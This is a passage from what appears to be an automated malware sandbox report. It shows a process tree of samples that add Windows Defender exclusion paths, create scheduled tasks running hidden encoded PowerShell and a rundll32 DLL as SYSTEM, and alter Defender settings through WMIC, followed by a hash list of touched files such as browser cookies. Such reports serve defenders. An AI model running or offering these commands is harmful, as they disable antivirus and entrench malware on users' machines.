Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5920
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:2028
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:4240
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1472
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5304
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5632
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5536
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5580
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5176
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:5912
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3640
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:6424
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:6040
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5504
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5608
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5656
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5256
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:6220
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3212
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:1172
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4672
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:2264
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /CREATE /TN "guIwAYJvU" /SC once /ST 08:05:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                PID:7140
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /run /I /tn "guIwAYJvU"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3872
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "guIwAYJvU"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3140
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 10:13:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\JTziAwN.exe\" XT /Fzsite_idVle 385118 /S" /V1 /F
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                    PID:3148
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5404
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4352
                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:6424
                                                                                                                                                                                                                                      • C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\JTziAwN.exe
                                                                                                                                                                                                                                        C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\JTziAwN.exe XT /Fzsite_idVle 385118 /S
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:5872
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2408
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4732
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3396
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:5608
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:5420
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:6160
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\JKDMgf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                        PID:1768
                                                                                                                                                                                                                                                    • C:\Windows\windefender.exe
                                                                                                                                                                                                                                                      C:\Windows\windefender.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:5472
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:1768
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:1196

                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            2.0MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            cb971c6de5a3cf7b3cc57c3dc8ca39c4

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            5ecccd3c7c8a65d93234c87402ba198c82917f5f

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            cb8519847b158d3d37a57a92ec4ba44fbb599a852bb1aacbc51013cb056bdd36

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            01bb15990ae18d1f20ae71a49be9ebaa8f2c1044953cbf2202bd8f79e6f5f3d66d11a4b9f387a442452af1353e788a7b60fdf193aa6dc9b5be1ca3ba552c349c

                                                                                                                                                                                                                                                          • C:\ProgramData\mozglue.dll
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            593KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            360B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            4056245541b1ab62c9cba1c0f61b25f4

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            b40fe66efb296c0f260452180b9d153d092895f9

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            84435d8a56303d5fca9840a10289cc21d56ce2361d31d5f6713a03a6b284bc09

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            e68a07049f7ddfe8b5b9a59214939cca3c0dccfaba6ea2e77ca83f7b16457d8409cff9301832992132350e9a06b7b76feb16da9947156322bf7a6827c416cdb8

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            187B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            136B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            150B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            152KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            49d49a45eddcaf4445aac841e1cd9274

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            169398de195fce7256d125dcddd919c4a4d76143

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            750b8af33cdfafc541f63dc1bff16731272696f9854aba9d6a87a42d960574c3

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            29829803b856436aee91ff0c506a28152a42c1ffccfbb83b36692dc881359183c880fe6be89042d946f5e302f90cd05e4255fb88b3215f0010d0c91bf2d0660f

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            16ab66c39a51dd938eff509dadcc7d85

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            2894e221580612dd55132bd557ec3fda8815cb50

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            d30a8bfb670477c1e834cf2e3d12d99d6fe493fc09e5249a645705c2e21cb6b8

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            031ff68568560d2132f3fea22daecc7e4bbc6f4bc958a9bec5c094bccb5ddf17ed0baa2ca8d22bb4494329f4d88f79ed80ae447bfc81b52313bc5bb895e75c54

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            2B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            524B

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            4bd019e66d030ac39e912db885c33a04

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            5345d3759836ccbe9e90898f80914230e40e7eb5

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            4931a2ee9beeed0f5d9bf69e795f63b87aab9d7387d0d306954cbdb6ffe3caf8

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            e02e876d48a0dc5482596b3a9e59b0573bcdf57e06dbc174b98063a834aeb0321c4977ebe5208a0f61e4fc435a258af507c2426e145299ea839fec5b74cf0550

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            7a0de22d829a1571ab1a50792dc66f0f

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            29e17e6f70ddfc39f7fec35dc9924764efcd2921

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            5210762ac99fd1ef1ee44e09a655354ad3b47b2f6d7e1d8f313515f405033433

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            c10a65988638491a882041700257bcbc6856c9cbff9498b6a28134c025601bb9fb2c410158ea005ea767f7f1a85469b2c4a6372eaded6653ea7faeeb7bb5c6f9

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            16KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            5a1349a810dc92ec0c1b3782c1a38193

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            335b59a6e9063c1d13ec00be39a6e3b65b947223

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            9f4ebab138341de7977238b6bdc690258fc3a17cfbcbd1eebde6fe6fd4aa03a9

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            4be68b469798d1348c4e060ad5fab181ced20e5a67e3fdab0d796145ab50b43273729d60496f2172d0794231e7142ac54ec35d688eff91a4259ddb62507c9f91

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            252KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            d4f6f14b030211be3eb191f711990c50

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            9ad5514cc87ad1dd3f06e413c043aeb38792ca0f

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            c489dd04a6face45ac077bcb502db8643ade200d7097fa091037e276044a840f

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            059057c018eb29d60192fb25cbdc2c8cadfb0ea27cd78b6e204373d3fae898794ccd4d8ddedd36104e9f46068d9db59ba7ab3c3ba94345c11ad95cc9ad37524c

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            3KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            fe3aab3ae544a134b68e881b82b70169

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            baa7aea69f1fc6de5c6744a3de244d9c

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            7ac32cd8e4afa29cbb6c04bb8727735c29ebadc5

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            adb474e336b151cf28ead952e8248f9ec8daf30aadc78e716822d9c27f6dde69

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            4927c72a9d778a8343f812714356150069349e39937f2e32c62f19ffee226b94eada91756f07f96e22472252f20185177038b3e1e1dd7b8920d676e4e2198f0c

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191601301\additional_file0.tmp
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            2.5MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            15d8c8f36cef095a67d156969ecdb896

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            a1435deb5866cd341c09e56b65cdda33620fcc95

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8

                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                            d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a

                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191601301\opera_package
                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            103.8MB

                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                            5014156e9ffbb75d1a8d5fc09fabdc42

                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                            6968d1b5cec3039e53bbbedeee22e2d43d94c771

                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                            7a01e11e1830ba3c154e5a6c383da15938b1e48f89a2fe4045cdd260924b6802

                                                                                                                                                                                                                                                            SHA512

